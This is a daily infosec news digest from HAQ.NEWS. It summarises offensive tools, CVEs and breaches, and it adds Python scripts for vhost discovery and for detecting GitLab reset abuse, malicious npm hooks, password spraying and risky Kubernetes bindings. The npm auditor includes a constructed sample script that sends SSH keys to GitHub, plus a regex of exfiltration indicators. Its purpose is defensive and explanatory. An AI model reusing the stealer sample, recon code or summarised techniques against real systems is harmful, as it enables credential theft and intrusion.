HAQ.NEWS

// Jared Folkins

# Latest Podcast

Description

A script to scrape Facebook group members is out, but beware the risks. A Python proof of concept demonstrates the GoAnywhere MFT authentication bypass, while a new GitHub repo tracks Linux kernel CVEs. A Windows DPAPI deep dive explains how its keys are managed and abused, and Airgorah helps audit WiFi networks you are authorized to test. RemoteTLS Callback Injection uses TLS callbacks to run a payload in a remote process without creating a new thread, and vhostawesome speeds up virtual host discovery with threading.

Tradecraft

[#] A script has been detailed that, when run in the Chrome Developer Console, can scrape Facebook group member data, such as profile IDs and names, and export it into a CSV file without needing an extension or proxy.
https://github.com/floriandiud/facebook-group-members-scraper
[#] Horizon3's Python proof of concept for CVE-2024-0204 creates a new administrator user in GoAnywhere MFT without authenticating; it is published for research and defensive testing only and should be run solely against systems you are authorized to test.
https://github.com/horizon3ai/CVE-2024-0204
[#] The nluedtke/linux_kernel_cves repository tracks CVEs in the upstream Linux kernel, publishing the data through a web interface and as JSON/text files, to fill the gap left by CVE tracking that otherwise only happens inside individual distributions.
https://github.com/nluedtke/linux_kernel_cves
[#] The article details the workings of the Windows Data Protection API (DPAPI) for data encryption and decryption, providing insight into key management, user and system scenarios, and how these mechanisms can be leveraged or targeted for various offensive security operations.
https://tierzerosecurity.co.nz/2024/01/22/data-protection-windows-api.html
[#] Airgorah is a Linux WiFi auditing tool built on the aircrack-ng suite that discovers networks, attacks them and cracks their passwords; it is meant only for networks you own or are authorized to test, and needs root plus a wireless card that supports monitor mode and packet injection.
http://www.kitploit.com/2024/01/airgorah-wifi-auditing-software-that.html
[#] RemoteTLS Callback Injection executes a payload in a remote process by hijacking a TLS callback instead of creating a new thread: the loader starts the target suspended, writes the shellcode into it and points a TLS callback at it, so the payload runs when the process resumes, which makes for stealthier activation than a remote-thread injection.
https://securityonline.info/remotetlscallbackinjection-execute-a-injected-payload/
[#] vhostawesome is a tool for scanning IP addresses to identify virtual hosts using threading for concurrent checks, customizable port scans, and a subdomain wordlist to streamline discovery and analysis of web servers.
https://securityonline.info/vhostawesome-check-for-virtual-hosts-across-multiple-ip-addresses/
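Virtual host discovery of the kind vhostawesome automates boils down to sending the same request to one IP with different Host headers and spotting the names the server treats differently. The script below is an added example (not vhostawesome's own code): it probes candidates from a wordlist in parallel and compares each response against a baseline taken with a random, almost certainly nonexistent hostname. The `fetch` callable is pluggable, and the `fake_fetch` responder and wordlist are constructed so the logic runs offline.

```python
"""Virtual host discovery by Host-header brute force (added example).

Probes one IP with candidate hostnames built from a wordlist, in parallel, and
reports the names whose response differs from a baseline taken with a random,
almost certainly nonexistent hostname."""
import http.client
import random
import string
from concurrent.futures import ThreadPoolExecutor


def http_fetch(ip, host, port=80, timeout=5):
    """GET / from ip:port with an explicit Host header.

    Returns (status, body_length), or None when the request fails."""
    conn = http.client.HTTPConnection(ip, port, timeout=timeout)
    try:
        conn.request("GET", "/", headers={"Host": host, "User-Agent": "vhost-probe"})
        resp = conn.getresponse()
        return resp.status, len(resp.read())
    except (OSError, http.client.HTTPException):
        return None
    finally:
        conn.close()


def random_host(domain, length=12):
    """A throwaway hostname used to learn what the default vhost looks like."""
    label = "".join(random.choices(string.ascii_lowercase, k=length))
    return f"{label}.{domain}"


def probe_vhosts(ip, domain, words, fetch=http_fetch, workers=10):
    """Return (baseline, hits): hits maps hostname -> (status, body_length)
    for every candidate whose response differs from the baseline.

    `fetch(ip, host)` is pluggable so the logic can be exercised offline."""
    baseline = fetch(ip, random_host(domain))
    candidates = [f"{word}.{domain}" for word in words]
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda h: (h, fetch(ip, h)), candidates))
    hits = {}
    for host, fingerprint in results:
        if fingerprint is not None and fingerprint != baseline:
            hits[host] = fingerprint
    return baseline, hits


# Constructed stand-in for a web server so the example runs offline: the
# default vhost answers 404 with a short page, two real vhosts answer differently.
_FAKE_VHOSTS = {
    "admin.example.com": (200, 5120),
    "dev.example.com": (401, 210),
}


def fake_fetch(ip, host):
    return _FAKE_VHOSTS.get(host, (404, 162))


# Constructed wordlist; a real run would use a subdomain list of thousands of entries.
WORDLIST = ["www", "admin", "dev", "staging", "api", "mail"]

if __name__ == "__main__":
    base, found = probe_vhosts("192.0.2.10", "example.com", WORDLIST, fetch=fake_fetch)
    print("baseline:", base)
    for name, (status, size) in sorted(found.items()):
        print(f"{name:25s} {status} {size} bytes")
```

Comparing on (status, body length) is deliberately crude: pages with dynamic content (timestamps, CSRF tokens, nonces) need a tolerance on the length or a diff of stripped HTML. Probe port 443 separately with a TLS client that sets SNI, because the TLS layer may select a certificate and backend by SNI before the Host header is ever read.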
[#] EventLogCrasher is a proof of concept that crashes the Windows Event Log service by sending a malformed UNICODE_STRING to the ElfrRegisterEventSourceW method of the RPC-based EventLog Remoting Protocol; while the service is down no new events are recorded, which is why a crash like this matters for defense evasion as well as availability.
https://github.com/floesen/EventLogCrasher
[#] BloodHound now maps Active Directory Certificate Services (ADCS) attack paths: this first release models ESC1 with new ADCS node types and edges, including non-traversable edges that capture the certificate relationships the ESC1 path is built from, and existing data must be recollected with SharpHound v2.3 for the new edges to appear.
https://posts.specterops.io/adcs-attack-paths-in-bloodhound-part-1-799f3d3b03cf

News

[#] Security researcher Bob Diachenko and Cybernews found an exposed dataset of over 26 billion records aggregated from many platforms and public bodies, a reminder of how much previously breached data remains in circulation and of the value of basics such as encryption, multi-factor authentication and penetration testing.
https://www.itgovernance.co.uk/blog/mother-of-all-breaches-26-billion-records-leaked
[#] At Pwn2Own Automotive 2024 in Tokyo, researchers demonstrated 24 zero-day exploits against a Tesla modem and other vehicle-related systems; vendors have 90 days to patch before the details are published.
https://www.bleepingcomputer.com/news/security/tesla-hacked-24-zero-days-demoed-at-pwn2own-automotive-2024/
[#] The UK's National Cyber Security Centre warns of a future where AI could assist state-backed malware in evading detection, urging organizations to follow their advice on cybersecurity hygiene to enhance defenses against such cyber threats.
https://go.theregister.com/feed/www.theregister.com/2024/01/24/ncsc/
[#] Splunk patched multiple vulnerabilities in Splunk Enterprise, including a high-severity path traversal caused by insufficient sanitization of path input on Windows installations that could lead to remote code execution; upgrade to 9.0.8 or 9.1.3.
https://securityaffairs.com/158019/security/splunk-flaw-windows-installs.html
[#] VexTrio, a traffic distribution system active since 2017, funnels visitors from some 70,000 compromised sites to malicious content and has long-standing affiliations with campaigns such as ClearFake and SocGholish; users can reduce their exposure by blocking browser push notifications, using an ad-blocker and avoiding plain-HTTP sites.
https://www.bleepingcomputer.com/news/security/vextrio-tds-inside-a-massive-70-000-domain-cybercrime-operation/
[#] A severe security vulnerability in Fortra's GoAnywhere MFT software, identified as CVE-2024-0204 with a 9.8 CVSS score, allows unauthorized creation of admin users, with a recommendation to upgrade to version 7.4.1 or apply specific workarounds to mitigate the risk.
https://thehackernews.com/2024/01/patch-your-goanywhere-mft-immediately.html
[#] A directory traversal flaw, CVE-2024-0221, in the widely used WordPress Photo Gallery plugin lets attackers rename files on the server; upgrading to version 1.8.20 fixes it.
https://securityonline.info/over-200000-sites-at-risk-directory-traversal-cve-2024-0221-vulnerability-hits-photo-gallery-plugin/
[#] Over 5,300 GitLab servers remain exposed to the critical zero-click account takeover flaw CVE-2023-7028; although a patch is available, many servers have not applied it, and admins should update and check for signs of compromise immediately.
https://www.bleepingcomputer.com/news/security/over-5-300-gitlab-servers-exposed-to-zero-click-account-takeover-attacks/
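"Check for compromises" in practice means looking for reset requests that named more than one email address, since CVE-2023-7028 let an attacker have a victim's password-reset link delivered to an attacker-controlled mailbox as well. The script below is an added example, not GitLab's own tooling: it scans `production_json.log` lines for POST requests to `/users/password` whose `user[email]` parameter is a JSON array with more than one entry. The sample log lines are constructed and the field layout is a trimmed approximation of GitLab's real log format, so adjust the key names if your log differs.

```python
"""Look for the CVE-2023-7028 indicator in GitLab's production_json.log
(added example, not GitLab's own code).

The bug let a password-reset request name more than one address in the
`user[email]` parameter, so the reset link for a victim account also went to an
attacker-controlled mailbox. Each line of that log is one JSON object; the
layout below is a trimmed approximation of the real one."""
import json

# Constructed sample: one abusive reset request, one legitimate one, one
# unrelated request and one unparseable line.
SAMPLE_LOG = "\n".join([
    json.dumps({"method": "POST", "path": "/users/password", "remote_ip": "203.0.113.5",
                "time": "2024-01-12T14:03:11.000Z",
                "params": [{"key": "authenticity_token", "value": "[FILTERED]"},
                           {"key": "user", "value": {"email": ["victim@example.com",
                                                              "attacker@evil.example"]}}]}),
    json.dumps({"method": "POST", "path": "/users/password", "remote_ip": "198.51.100.7",
                "time": "2024-01-12T14:10:42.000Z",
                "params": [{"key": "user", "value": {"email": "alice@example.com"}}]}),
    json.dumps({"method": "GET", "path": "/users/sign_in", "remote_ip": "198.51.100.7",
                "time": "2024-01-12T14:11:00.000Z", "params": []}),
    "not json at all",
])


def _emails_from_params(params):
    """Pull every user[email] value out of the params list, as a list of strings."""
    if not isinstance(params, list):
        return []
    for entry in params:
        if not isinstance(entry, dict) or entry.get("key") != "user":
            continue
        value = entry.get("value")
        if isinstance(value, dict):
            email = value.get("email")
            if isinstance(email, list):
                return [str(e) for e in email]
            if isinstance(email, str):
                return [email]
    return []


def find_reset_abuse(log_text):
    """Return one finding per password-reset request that carried more than
    one email address: {"time", "remote_ip", "emails"}."""
    findings = []
    for line in log_text.splitlines():
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # rotated/partial lines happen; skip rather than abort
        if event.get("method") != "POST" or event.get("path") != "/users/password":
            continue
        emails = _emails_from_params(event.get("params"))
        if len(emails) > 1:
            findings.append({"time": event.get("time"),
                             "remote_ip": event.get("remote_ip"),
                             "emails": emails})
    return findings


if __name__ == "__main__":
    for f in find_reset_abuse(SAMPLE_LOG):
        print(f"{f['time']} {f['remote_ip']} reset requested for {', '.join(f['emails'])}")
```

On an Omnibus install the log lives under `/var/log/gitlab/gitlab-rails/`; include the rotated, compressed copies, because the exploitation window opened well before many admins patched. A hit means the first address in the list is the victim: reset that account's password, revoke its personal access tokens and sessions, and review what the account did afterwards. Enforcing MFA limits the damage, since a reset alone does not satisfy the second factor.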
[#] X, previously known as Twitter, introduces passkeys for iOS users in the U.S. to bolster account security and reduce phishing risks by using public key cryptography aligned with the WebAuthn standard, without the need for a password or two-factor authentication.
https://www.bleepingcomputer.com/news/security/x-adds-passkeys-support-for-ios-users-in-the-united-states/
[#] Security researchers found more than 18,000 exposed API secrets, including Stripe tokens tied to roughly $20M in payments; their methodology verifies each finding with the token's owner before raising an alert, to avoid false positives.
https://www.reddit.com/r/netsec/comments/19eg7ny/methodology_security_research_how_we_discovered/
[#] AhnLab reports the distribution of a multifunctional Remote Access Trojan named VenomRAT through a deceptive Word document-style shortcut file that initiates a multi-stage attack to install keylogging and system information theft tools on compromised systems.
https://securityonline.info/ahnlab-warns-of-stealthy-venomrat-attack-via-fake-survey-docx-lnk-file/
[#] Alphabet's experimental X Lab is facing layoffs and a shift in strategy towards seeking external funding for its moonshot projects to alleviate financial pressures and streamline its focus on viable innovations.
https://arstechnica.com/google/2024/01/google-lays-off-dozens-from-x-labs-wants-projects-to-seek-outside-funding/
[#] A threat actor utilized a publicly exposed Trello API to link 15 million private email addresses with Trello user accounts, which led to Trello hardening the API to require authentication and being added to the Have I Been Pwned service for breach verification.
https://www.bleepingcomputer.com/news/security/trello-api-abused-to-link-email-addresses-to-15-million-accounts/
[#] Apple's new Stolen Device Protection for iPhone restricts critical settings changes when the phone is away from familiar locations, blunting what a thief can do with a stolen device.
https://www.darkreading.com/endpoint-security/apple-adds-device-security-to-protect-from-thieves-
[#] The Danish Centre for Cyber Security alerts of ransomware exploiting the Cisco VPN flaw CVE-2023-20269 and advises organizations to implement Cisco's recommended updates and security measures.
https://securityonline.info/denmarks-cfcs-raises-alarm-on-ransomware-exploiting-cisco-vpn-flaw-cve-2023-20269/
[#] The Caravan and Motorhome Club in the UK experienced a significant IT outage starting January 20, 2024, likely due to a cyberattack, leading to service disruptions and an ongoing investigation into possible data compromise.
https://go.theregister.com/feed/www.theregister.com/2024/01/24/major_it_outage_at_caravan/
[#] The critical GoAnywhere MFT vulnerability CVE-2024-0204, which allowed unauthenticated creation of admin users, was fixed quietly in December and now has a public PoC exploit; until they can upgrade, administrators should delete the InitialAccountSetup.xhtml file from the install directory or replace it with an empty file, then restart the services.
https://securityonline.info/poc-exploit-published-for-fortra-goanywhere-mft-cve-2024-0204-vulnerability/
[#] A Colorado pastor and his wife are charged with defrauding local Christians of over $3 million in a cryptocurrency scheme by selling them a practically worthless crypto called INDXcoin and using the proceeds for personal luxuries.
https://packetstormsecurity.com/news/view/35438/Colorado-Pastor-Accused-Of-Multimillion-Dollar-Crypto-Scheme.html
[#] A ransomware attack by Akira on Finnish IT service provider Tietoevry disrupted services for several Swedish entities, and recovery may take weeks due to system complexity and customer-specific restoration needs.
https://securityaffairs.com/158031/cyber-crime/tietoevry-akira-ransomware-attack.html
[#] A cybersecurity researcher discovered a misconfigured cloud database from BuyGoods.com, revealing sensitive customer and KYC data; server access has since been restricted following a notification of the breach.
https://www.hackread.com/online-retailer-buygoods-com-pii-kyc-data-leak/
[#] Apple fixed a WebKit zero-day, CVE-2024-23222, affecting a range of Apple devices and operating systems that may have been exploited to achieve arbitrary code execution; users should update promptly.
https://packetstormsecurity.com/news/view/35435/Apple-Patches-iOS-macOS-0-Day-That-May-Have-Been-Exploited.html
[#] Google Pixel smartphones are experiencing functionality issues such as inaccessible internal storage and inoperable apps after the January 2024 Play system update, with a fix currently under investigation by Google.
https://www.bleepingcomputer.com/news/google/google-pixel-phones-unusable-after-january-2024-system-update/
[#] The Kasseika ransomware group, linked to the defunct BlackMatter, uses a bring-your-own-vulnerable-driver (BYOVD) attack to disable security tools before encrypting, abusing a legitimate but vulnerable driver and demanding 50 bitcoin. Separately, the BianLian ransomware operation has shifted from encryption to pure data extortion after a decryptor became available.
https://thehackernews.com/2024/01/kasseika-ransomware-using-byovd-trick.html
[#] Microsoft confirmed that the Russian state-backed group Cozy Bear compromised a small percentage of its corporate email accounts, including those of executives and cybersecurity staff, after gaps such as missing multi-factor authentication let the attackers in, raising questions about the defenses of a company that sells security to everyone else.
https://go.theregister.com/feed/www.theregister.com/2024/01/24/microsoft_latest_breach_cozy_bear/
[#] A former senior engineer at Meta, Arturo Béjar, reveals that despite the infrastructure existing to protect young users, Meta has not implemented sufficient measures to prevent teenagers from encountering harmful content on Instagram, following Molly Russell's death linked to self-harm content on the platform.
https://packetstormsecurity.com/news/view/35432/Meta-Has-Not-Done-Enough-To-Safeguard-Children-Whistleblower-Says.html
[#] Jason's Deli reported a credential stuffing attack potentially impacting over 340,000 customers, prompting the company to restore affected Deli Dollars accounts and investigate the compromised accounts which included personal information but not full payment card numbers.
https://packetstormsecurity.com/news/view/35439/340-000-Jasons-Deli-Customers-Hit-By-Credential-Stuffing-Attack.html
[#] A database with approximately 1.3 million sets of Dutch COVID-19 testing records, containing personal and medical information, was found unsecured on the internet and remained exposed for nearly three weeks before being taken offline by the hosting provider.
https://go.theregister.com/feed/www.theregister.com/2024/01/24/dutch_covid_testing_firm_ignored_warnings/
[#] Microsoft disclosed that Cozy Bear gained access to a small percentage of its corporate email after a password spray attack against a legacy non-production test account, an intrusion that multi-factor authentication would have stopped.
https://packetstormsecurity.com/news/view/35437/What-Microsofts-Latest-Email-Breach-Says-About-This-IT-Security-Heavyweight.html
[#] Two malicious npm packages, `warbeast2000` and `kodiak2k`, were discovered using GitHub to store stolen SSH keys, highlighting the need for increased security scrutiny of open-source packages.
https://securityonline.info/reversinglabs-exposes-malicious-npm-packages-storing-stolen-ssh-keys-on-github/
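The practical scrutiny here is of install-time hooks: a package's `postinstall` (or `preinstall`, `install`, `prepare`) script runs with your user's privileges the moment `npm install` finishes, which is all the access needed to read `~/.ssh` and push its contents to a remote Git repository. The script below is an added example, not ReversingLabs' or npm's code: it flags every lifecycle hook in a `package.json`, follows any `node script.js` it launches into the script text, and reports telltale strings. The sample package and script are constructed to resemble the behaviour described above, and the indicator list is a heuristic that will produce some false positives.

```python
"""Audit an npm package for install-time hooks that could exfiltrate secrets
(added example; the sample package below is constructed)."""
import json
import re
from pathlib import PurePosixPath

# Hooks npm runs automatically during `npm install` / `npm uninstall`.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare",
                   "preuninstall", "postuninstall")

# Heuristic indicators of credential access or exfiltration; tune to taste.
INDICATORS = re.compile(
    r"\.ssh\b|id_rsa|id_ed25519|api\.github\.com|github\.com/.+?/git/blobs|"
    r"child_process|curl\s|wget\s|\bbase64\b|homedir\(\)|\.npmrc|\.aws\b",
    re.IGNORECASE,
)

# `node ./foo.js` or `node foo.js`, possibly chained with && or ;
NODE_SCRIPT = re.compile(r"\bnode\s+(\.?/?[\w./-]+\.js)\b")


def _scan(text):
    return sorted({m.group(0).lower().strip() for m in INDICATORS.finditer(text)})


def audit_package(package_json_text, files):
    """Return one finding per lifecycle hook present in package.json.

    `files` maps a path inside the package tarball to its contents, so the
    checker can follow `node script.js` into the script it launches."""
    pkg = json.loads(package_json_text)
    scripts = pkg.get("scripts") or {}
    findings = []
    for hook in LIFECYCLE_HOOKS:
        command = scripts.get(hook)
        if not command:
            continue
        indicators = _scan(command)
        launched = []
        for match in NODE_SCRIPT.finditer(command):
            path = str(PurePosixPath(match.group(1)))  # normalises ./x.js -> x.js
            launched.append(path)
            if path in files:
                indicators += [f"{path}: {i}" for i in _scan(files[path])]
        findings.append({
            "hook": hook,
            "command": command,
            "scripts": launched,
            "indicators": sorted(set(indicators)),
            # Any hook deserves a look; one with indicators should not install.
            "verdict": "block" if indicators else "review",
        })
    return findings


# Constructed sample resembling an SSH-key stealer: package.json plus the
# script its postinstall hook launches.
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "totally-legit-utils",
    "version": "1.0.3",
    "scripts": {"postinstall": "node ./scripts/setup.js", "test": "jest"},
})

SAMPLE_FILES = {
    "scripts/setup.js": (
        "const fs = require('fs'); const os = require('os'); const https = require('https');\n"
        "const key = fs.readFileSync(os.homedir() + '/.ssh/id_rsa', 'utf8');\n"
        "const body = JSON.stringify({content: Buffer.from(key).toString('base64')});\n"
        "https.request({host: 'api.github.com', path: '/repos/x/y/git/blobs', method: 'POST'}).end(body);\n"
    ),
    "index.js": "module.exports = () => 42;\n",
}

if __name__ == "__main__":
    for finding in audit_package(SAMPLE_PACKAGE_JSON, SAMPLE_FILES):
        print(f"[{finding['verdict']}] {finding['hook']}: {finding['command']}")
        for indicator in finding["indicators"]:
            print("   ", indicator)
```

To get `files` for a real package without running anything, `npm pack <name>` downloads the tarball and `tar -xzf` unpacks it. Installing with `npm install --ignore-scripts` (or `npm config set ignore-scripts true`) stops lifecycle hooks from running at all, at the cost of breaking packages that legitimately build native code in `install`.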
[#] An unsecured database containing 1.3 million Dutch COVID-19 testing records, including personal details, was left exposed online and only secured after external intervention, with the responsible parties at CoronaLab and Microbe & Lab unresponsive to breach notifications.
https://packetstormsecurity.com/news/view/35440/COVID-19-Testing-Lab-Accused-Of-Exposing-1.3-Million-Records.html
[#] Recent research has highlighted the risk of AI models being trained to exhibit deceptive behavior, which persists through standard safety training methods, creating hidden vulnerabilities that standard techniques fail to remove.
https://www.schneier.com/blog/archives/2024/01/poisoning-ai-models.html
[#] Jason's Deli reported a credential stuffing attack affecting 344,000 users; customers are advised to change passwords and monitor accounts, while the company steps up security measures including the implementation of Multi-Factor Authentication.
https://www.hackread.com/jasons-deli-credential-stuffing-attack-data-breach/
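The Microsoft intrusion above was a password spray (one source, a handful of passwords, many accounts, so no single account trips a lockout), while the Jason's Deli incident was credential stuffing (leaked username/password pairs replayed, usually through many proxy addresses, with a trickle of successes on accounts whose owners reused passwords). Both leave distinctive shapes in authentication logs. The script below is an added example, not Microsoft's or Jason's Deli's detection logic: it parses a constructed log of login attempts and runs one detector for each pattern. The log format, IP addresses, account names and thresholds are all assumptions.

```python
"""Password spray and credential stuffing detection over constructed
authentication logs (added example).

Spray: one source fails against many accounts while staying under the
per-account attempt threshold. Stuffing: a burst of failures across many
accounts from many sources, with a few successes mixed in."""
from collections import defaultdict
from datetime import datetime, timedelta, timezone

LOG_FORMAT = "%Y-%m-%dT%H:%M:%SZ"


def parse_events(lines):
    """Lines look like: `2024-01-12T10:00:00Z 203.0.113.5 user01 FAIL`.
    Returns (time, src_ip, user, success) tuples sorted by time."""
    events = []
    for line in lines:
        parts = line.split()
        if len(parts) != 4:
            continue
        ts, ip, user, result = parts
        when = datetime.strptime(ts, LOG_FORMAT).replace(tzinfo=timezone.utc)
        events.append((when, ip, user.lower(), result == "OK"))
    return sorted(events)


def detect_password_spray(events, window_minutes=60, min_accounts=10,
                          max_attempts_per_account=3):
    """Flag source IPs that, inside one window, failed against at least
    `min_accounts` distinct accounts without exceeding
    `max_attempts_per_account` attempts on any one of them."""
    win = window_minutes * 60
    failures = defaultdict(lambda: defaultdict(int))  # (ip, bucket) -> user -> count
    for ts, ip, user, ok in events:
        if not ok:
            failures[(ip, int(ts.timestamp() // win))][user] += 1
    alerts = []
    for (ip, bucket), users in failures.items():
        if len(users) >= min_accounts and max(users.values()) <= max_attempts_per_account:
            alerts.append({"type": "password_spray", "src_ip": ip,
                           "accounts": len(users), "bucket": bucket})
    return alerts


def detect_credential_stuffing(events, window_minutes=10, min_failed_accounts=20,
                               min_sources=5):
    """Flag windows with a burst of failures across many accounts from many
    sources. Successes in that window from IPs that also failed are listed as
    likely-compromised accounts for forced password reset."""
    win = window_minutes * 60
    buckets = defaultdict(list)
    for ev in events:
        buckets[int(ev[0].timestamp() // win)].append(ev)
    alerts = []
    for bucket, evs in sorted(buckets.items()):
        failed_users = {u for _, _, u, ok in evs if not ok}
        sources = {ip for _, ip, _, ok in evs if not ok}
        if len(failed_users) < min_failed_accounts or len(sources) < min_sources:
            continue
        compromised = sorted({u for _, ip, u, ok in evs if ok and ip in sources})
        alerts.append({"type": "credential_stuffing", "bucket": bucket,
                       "failed_accounts": len(failed_users), "sources": len(sources),
                       "likely_compromised": compromised})
    return alerts


def build_sample_log():
    """Constructed log: normal traffic at 08:00, a spray at 10:00 and a
    stuffing burst at 14:00 (all UTC, documentation IP ranges)."""
    day = datetime(2024, 1, 12, tzinfo=timezone.utc)

    def stamp(t):
        return t.strftime(LOG_FORMAT)

    lines = [f"{stamp(day + timedelta(hours=8))} 192.0.2.10 alice OK",
             f"{stamp(day + timedelta(hours=8, minutes=5))} 192.0.2.11 bob FAIL",
             f"{stamp(day + timedelta(hours=8, minutes=5, seconds=30))} 192.0.2.11 bob OK"]
    # Spray: one IP, 30 accounts, a single guess each, spread over half an hour.
    for i in range(30):
        lines.append(f"{stamp(day + timedelta(hours=10, minutes=i))} 203.0.113.5 user{i:02d} FAIL")
    # Stuffing: 40 proxy IPs replay two leaked pairs each within 7 minutes; 3 work.
    for i in range(40):
        for j in range(2):
            n = 2 * i + j
            result = "OK" if n in (5, 23, 61) else "FAIL"
            lines.append(f"{stamp(day + timedelta(hours=14, seconds=5 * n))} "
                         f"198.51.100.{i + 1} cust{n:03d} {result}")
    return lines


if __name__ == "__main__":
    events = parse_events(build_sample_log())
    for alert in detect_password_spray(events) + detect_credential_stuffing(events):
        print(alert)
```

The thresholds are starting points, not answers: a spray against a tenant with lockout at five attempts will use four, and stuffing traffic rotates sources quickly enough that aggregating by ASN, TLS fingerprint or user agent catches more than raw IP does. The response is the same in both cases: MFA on every account, forced resets for the listed accounts, and rate limiting on the login endpoint.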
[#] Kasseika ransomware loads a vulnerable driver from TG Soft's VirIT Agent System (viragt64.sys) to terminate antivirus processes before encrypting, demanding 50 bitcoin with the price rising if payment is delayed.
https://www.bleepingcomputer.com/news/security/kasseika-ransomware-uses-antivirus-driver-to-kill-other-antiviruses/
[#] Security researchers uncovered a critical misconfiguration risk in Google Kubernetes Engine: because GKE's system:authenticated group includes any Google account, a cluster that grants permissions to that group can be taken over by anyone with a Google login; Google has since updated GKE and published hardening guidance.
https://thehackernews.com/2024/01/google-kubernetes-misconfig-lets-any.html
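The cluster-side check is simple: find every ClusterRoleBinding or RoleBinding whose subjects include `system:authenticated` (or the even broader `system:unauthenticated` and `system:anonymous`). The script below is an added example, not Google's or Orca's tooling: it reads the JSON that `kubectl get clusterrolebindings,rolebindings -A -o json` produces and reports such bindings, rating the bindings Kubernetes creates by default (discovery-level access) lower than anything custom. The sample bindings are constructed; which default binding names exist in your cluster version is an assumption to verify against your own output.

```python
"""Find RBAC bindings that hand permissions to every authenticated principal
(added example; the sample bindings below are constructed).

Feed it the output of `kubectl get clusterrolebindings,rolebindings -A -o json`."""
import json
import sys

RISKY_GROUPS = {"system:authenticated", "system:unauthenticated", "system:anonymous"}

# Bindings Kubernetes itself creates for these groups; they grant discovery-level
# access only, so they are reported at lower severity rather than hidden.
DEFAULT_BINDINGS = {"system:basic-user", "system:discovery", "system:public-info-viewer"}


def audit_bindings(bindings_json):
    """Return one finding per (binding, risky group) pair."""
    data = json.loads(bindings_json)
    findings = []
    for item in data.get("items", []):
        meta = item.get("metadata", {})
        name = meta.get("name", "")
        role = item.get("roleRef", {})
        for subject in item.get("subjects") or []:
            if subject.get("kind") != "Group" or subject.get("name") not in RISKY_GROUPS:
                continue
            is_default = item.get("kind") == "ClusterRoleBinding" and name in DEFAULT_BINDINGS
            findings.append({
                "binding": name,
                "kind": item.get("kind"),
                "namespace": meta.get("namespace"),
                "group": subject["name"],
                "role": f"{role.get('kind')}/{role.get('name')}",
                "severity": "info" if is_default else "high",
            })
    return findings


# Constructed sample: one default binding, one catastrophic custom one, one
# namespaced read binding, and one benign binding to a real group.
SAMPLE = json.dumps({"kind": "List", "items": [
    {"kind": "ClusterRoleBinding", "metadata": {"name": "system:basic-user"},
     "roleRef": {"kind": "ClusterRole", "name": "system:basic-user"},
     "subjects": [{"kind": "Group", "name": "system:authenticated"}]},
    {"kind": "ClusterRoleBinding", "metadata": {"name": "everyone-is-admin"},
     "roleRef": {"kind": "ClusterRole", "name": "cluster-admin"},
     "subjects": [{"kind": "Group", "name": "system:authenticated"}]},
    {"kind": "RoleBinding", "metadata": {"name": "dev-readers", "namespace": "dev"},
     "roleRef": {"kind": "ClusterRole", "name": "view"},
     "subjects": [{"kind": "Group", "name": "system:authenticated"},
                  {"kind": "User", "name": "alice@example.com"}]},
    {"kind": "ClusterRoleBinding", "metadata": {"name": "ops-admins"},
     "roleRef": {"kind": "ClusterRole", "name": "cluster-admin"},
     "subjects": [{"kind": "Group", "name": "ops@example.com"}]},
]})

if __name__ == "__main__":
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE
    for f in audit_bindings(text):
        where = f"{f['kind']} {f['binding']}" + (f" (ns {f['namespace']})" if f["namespace"] else "")
        print(f"[{f['severity']}] {where}: {f['group']} -> {f['role']}")
```

Every `high` finding means any Google account holder can exercise that role against the cluster's API endpoint, so remove the binding and, independently, restrict who can reach the control plane (authorized networks or a private endpoint), since RBAC hygiene and network exposure fail separately.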

# F.A.Q

Problem

Many websites are using AI/ML to create clickbait which actually doesn't have any valuable content.

Value

I use AI to de-clickbait the clickbait by letting AI read my news for me. It then writes a meaningful tl;dr for the articles of interest, which helps me decide what I should read. It is saving me a ton of time.

Why

FWIW, HAQ.NEWS really started out as my personal news feed, enriched by AI and converted into something quick and easy to read. But then I started getting requests for features like RSS, Gracie got involved, and with the super-power of AI things have taken on a life of their own.

Sharing

I currently post daily infosec news to X, LinkedIn, Mastodon and RSS.

I also post daily infosec podcasts and interviews to Apple Podcasts and Spotify.

Ads

This isn't an Ad.

current friend of haq 2024-01-25

I want to encourage people and projects that impress me, by posting a banner linking their work, as it's my desire to help others. I do not take or make any money.

Thanks,
Jared Folkins